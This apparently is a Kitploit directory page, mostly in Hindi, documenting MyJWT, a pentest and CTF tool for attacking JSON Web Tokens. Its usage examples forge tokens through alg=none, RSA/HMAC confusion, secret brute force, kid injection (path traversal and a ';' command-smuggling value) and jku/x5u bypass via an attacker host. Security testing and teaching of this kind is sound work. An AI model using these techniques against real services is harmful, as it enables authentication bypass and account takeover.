Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MyJWT — JSON Web Token (JWT) पर क्रैकिंग और कमजोरियों का परीक्षण करने के लिए एक CLI | Kitploit
उपकरण/GitHubGitHub/tyki6/myjwt
पासवर्ड क्रैकिंगभेद्यता विश्लेषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubtyki6/myjwt

MyJWT

JSON Web Token (JWT) पर क्रैकिंग और कमजोरियों का परीक्षण करने के लिए एक CLI

रिपॉजिटरी देखें
1381910 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MyJWT

mBouamama PyPI BlackArch package PyPI - Python Version PyPI - Download GitHub release (latest by date) Documentation Status Rawsec's CyberSecurity Inventory Code style: black codecov docstr_coverage codebeat badge Updates Known Vulnerabilities

परिचय

यह CLI पेंटेस्टर्स, CTF खिलाड़ियों या डेवलपर्स के लिए है।
आप अपने jwt को संशोधित कर सकते हैं, साइन कर सकते हैं, इंजेक्ट कर सकते हैं, आदि...
अधिक जानकारी के लिए दस्तावेज़ीकरण देखें।
यदि आपको कोई समस्या या सुधार दिखाई दे, तो एक मुद्दा भेजें। मैं जल्द से जल्द उत्तर दूंगा। आनंद लें :)

दस्तावेज़ीकरण

दस्तावेज़ीकरण http://myjwt.readthedocs.io पर उपलब्ध है

विषय सूची

  • विशेषताएँ
  • स्थापना
  • उपयोग
  • उदाहरण
  • डाउनलोड
  • योगदान
  • परिवर्तन लॉग

विशेषताएँ

  • नए jwt को क्लिपबोर्ड पर कॉपी करें
  • उपयोगकर्ता इंटरफ़ेस (धन्यवाद questionary)
  • रंगीन आउटपुट
  • jwt को संशोधित करें (हेडर/पेलोड)
  • None भेद्यता
  • RSA/HMAC भ्रम
  • कुंजी के साथ jwt पर हस्ताक्षर करें
  • कुंजी का अनुमान लगाने के लिए ब्रूट फ़ोर्स
  • रीजेक्स के साथ jwt को क्रैक करें ताकि कुंजी का अनुमान लगाया जा सके
  • kid इंजेक्शन
  • Jku बायपास
  • X5u बायपास

स्थापना

myjwt को स्थापित करने के लिए, बस pip का उपयोग करें:

root@kitploit:~
pip install myjwt

डॉकर इमेज से myjwt चलाने के लिए, चलाएँ:

root@kitploit:~
docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# On Windows
docker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

git पर myjwt स्थापित करने के लिए:

root@kitploit:~
git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help

BlackArch पर myjwt स्थापित करने के लिए:

root@kitploit:~
pacman -S myjwt

Packaging status

उपयोग

root@kitploit:~
$ myjwt --help
Usage: myjwt [OPTIONS] JWT

  This cli is for pentesters, CTF players, or dev.
  You can modify your jwt, sign, inject ,etc...
  Full documentation is at http://myjwt.readthedocs.io.
  If you see problems or enhancement send an issue.I will respond as soon as possible.
  Enjoy :)
  All new jwt will be copy to the clipboard.

Options:
  --version                    Show the version and exit.
  --full-payload TEXT          New payload for your jwt.Json format Required.
  -h, --add-header TEXT        Add a new key, value to your jwt header, if key
                               is present old value will be replaced.Format:
                               key=value.

  -p, --add-payload TEXT       Add a new key, value to your jwt payload, if
                               key is present old value will be
                               replaced.Format: key=value.

  --sign TEXT                  Sign Your jwt with key given.
  --verify TEXT                verify your key.
  -none, --none-vulnerability  Check None Alg vulnerability.
  --hmac PATH                  Check RS/HMAC Alg vulnerability.
  --bruteforce PATH            Bruteforce to guess the secret used to sign the
                               token.

  -r, --crack TEXT             regex to iterate all string possibilities to
                               guess the secret used to sign the token.

  --kid TEXT                   Kid Injection sql
  --jku TEXT                   Jku Header to bypass authentication
  --x5u TEXT                   X5u Header to bypass authentication
  --crt TEXT                   For x5cHeader, force crt file
  --key TEXT                   For jku or x5c Header, force private key to
                               your key file

  --file TEXT                  For jku Header and x5u Header, force file name
  --print                      Print Decoded JWT
  -u, --url TEXT               Url to send your jwt.
  -m, --method TEXT            Method use for send request to url.(Default
                               GET).

  -d, --data TEXT              Data send to your url.Format: key=value. if
                               value = MY_JWT value will be replace by new
                               jwt.

  -c, --cookies TEXT           Cookies to send to your url.Format: key=value.
                               if value = MY_JWT value will be replace by new
                               jwt.

  --help                       Show this message and exit.

JWT संशोधित करें

अपने JWT की जाँच करें (HS alg)

विकल्पप्रकारउदाहरणसहायता
--signtextmysecretkeyअपनी कुंजी से अपने jwt पर हस्ताक्षर करें
--verifytextmysecretkeyअपनी कुंजी सत्यापित करें।

शोषण

अपना jwt भेजें

अन्य

उदाहरण

  • अपना jwt संशोधित करें
  • None भेद्यता जाँच
  • कुंजी पर हस्ताक्षर करें
  • ब्रूट फ़ोर्स हस्ताक्षर
  • RSA/HMAC भ्रम
  • Kid इंजेक्शन
  • अपना नया Jwt url पर भेजें
  • Jku भेद्यता
  • X5u भेद्यता

अपना Jwt संशोधित करें

CLI

root@kitploit:~
myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

कोड

root@kitploit:~
from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

पूरा उदाहरण यहाँ: 01-modify-jwt

None भेद्यता

CLI

root@kitploit:~
myjwt YOUR_JWT --none-vulnerability

कोड

root@kitploit:~
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

पूरा उदाहरण यहाँ: 02-none-vulnerability

कुंजी पर हस्ताक्षर करें

CLI

root@kitploit:~
myjwt YOUR_JWT --sign YOUR_KEY

कोड

root@kitploit:~
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = "test"
jwt = signature(jwt_to_json(jwt), key)

पूरा उदाहरण यहाँ: 03-sign-key

ब्रूट फ़ोर्स

CLI

root@kitploit:~
myjwt YOUR_JWT --bruteforce PATH

कोड

root@kitploit:~
from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)

पूरा उदाहरण यहाँ: 04-brute-force

क्रैक

CLI

root@kitploit:~
myjwt YOUR_JWT --crack REGEX

RSA/HMAC भ्रम

CLI

root@kitploit:~
myjwt YOUR_JWT --hmac FILE

कोड

root@kitploit:~
from myjwt.vulnerabilities import confusion_rsa_hmac
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)

पूरा उदाहरण यहाँ: 05-rsa-hmac-confusion

Kid इंजेक्शन

CLI

root@kitploit:~
myjwt YOUR_JWT --kid INJECTION

कोड

root@kitploit:~
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

पूरा उदाहरण यहाँ: 06-kid-injection

अपना नया Jwt url पर भेजें

CLI

root@kitploit:~
myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

Jku भेद्यता

CLI

root@kitploit:~
myjwt YOUR_JWT --jku YOUR_URL

कोड

root@kitploit:~
from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

पूरा उदाहरण यहाँ: 07-jku-bypass

X5U भेद्यता

CLI

root@kitploit:~
myjwt YOUR_JWT --x5u YOUR_URL

कोड

root@kitploit:~
from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

पूरा उदाहरण यहाँ: 08-x5u-bypass

डाउनलोड

GitHub रिलीज़ देखें। नवीनतम https://github.com/mBouamama/MyJWT/releases/latest पर उपलब्ध है।

योगदान

  • इस रिपॉजिटरी को फ़ोर्क करें या क्लोन करें
  • एक नई शाखा बनाएं (feature, hotfix, आदि)
  • आवश्यक परिवर्तन करें और उन परिवर्तनों को कमिट करें
  • make lint के साथ लिंट जाँचें
  • make test के साथ यूनिट_टेस्ट जाँचें
  • पुल रिक्वेस्ट भेजें मैं जल्द से जल्द जाँच करूंगा।

परिवर्तन लॉग

लॉग काफी लंबा हो गया है। यह अपनी स्वयं की फ़ाइल में स्थानांतरित हो गया है।

देखें CHANGES।

टूल डाउनलोड करें
विकल्पप्रकारउदाहरणसहायता
--ful-payloadJSON{"user": "admin"}आपके jwt के लिए नया payload।
-h, --add-headerkey=valueuser=adminआपके jwt हेडर में एक नई key, value जोड़ें, यदि key मौजूद है तो पुरानी value बदल दी जाएगी।
-p, --add-payloadkey=valueuser=adminआपके jwt payload में एक नई key, value जोड़ें, यदि key मौजूद है तो पुरानी value बदल दी जाएगी।
विकल्पप्रकारउदाहरणसहायता
-none, --none-vulnerabilityकुछ नहींNone Alg भेद्यता की जाँच करें।
--hmacPATH./public.pemRS/HMAC Alg भेद्यता की जाँच करें, और अपने jwt को सार्वजनिक कुंजी से हस्ताक्षरित करें।
--bruteforcePATH./wordlist/big.txtटोकन पर हस्ताक्षर करने के लिए उपयोग किए गए गुप्त का अनुमान लगाने के लिए ब्रूटफ़ोर्स। सभी पासवर्ड (1 प्रति पंक्ति) के साथ txt फ़ाइल का उपयोग करें।
--crackREGEX"[a-z]{4}"टोकन पर हस्ताक्षर करने के लिए उपयोग किए गए गुप्त का अनुमान लगाने के लिए सभी स्ट्रिंग संभावनाओं को पुनरावृत्त करने का रीजेक्स।
--kidtext"00; echo /etc/.passwd"Kid इंजेक्शन sql
--jkutextMYPUBLICIPJku हेडर प्रमाणीकरण को बायपास करने के लिए, यदि आप अपनी jwks फ़ाइल का नाम बदलना चाहते हैं तो --file का उपयोग करें, और यदि आप अपनी स्वयं की निजी pem का उपयोग करना चाहते हैं तो --key का उपयोग करें।
--x5utextMYPUBLICIPjku या x5c हेडर के लिए, यदि आप अपनी jwks फ़ाइल का नाम बदलना चाहते हैं तो --file का उपयोग करें, और यदि आप अपनी स्वयं की निजी pem का उपयोग करना चाहते हैं तो --key का उपयोग करें।
विकल्पप्रकारउदाहरणसहायता
-u, --urlurlhttp://challenge01.root-me.org/web-serveur/ch59/adminअपना jwt भेजने के लिए url.
-m, --methodtextPOSTurl पर अनुरोध भेजने के लिए उपयोग की जाने वाली विधि।(डिफ़ॉल्ट: GET)।
-d, --datakey=valuesecret=MY_JWTअपने url पर भेजने के लिए डेटा।प्रारूप: key=value। यदि value = MY_JWT है तो value आपके नए jwt से बदल दी जाएगी।
-c, --cookieskey=valuesecret=MY_JWTअपने url पर भेजने के लिए कुकीज़।प्रारूप: key=value। यदि value = MY_JWT है तो value आपके नए jwt से बदल दी जाएगी।
विकल्पप्रकारउदाहरणसहायता
--crtPATH./public.crtx5cHeader के लिए, crt फ़ाइल को बाध्य करें
--keyPATH./private.pemjku या x5c हेडर के लिए, अपनी कुंजी फ़ाइल पर निजी कुंजी को बाध्य करें
--filetextmyfilejku हेडर के लिए, .json एक्सटेंशन के बिना फ़ाइल नाम को बाध्य करें
--printकुछ नहींडिकोड किया गया JWT प्रिंट करें
--helpकुछ नहींसहायता संदेश दिखाएं और बाहर निकलें।
--versionकुछ नहींMyjwt संस्करण दिखाएं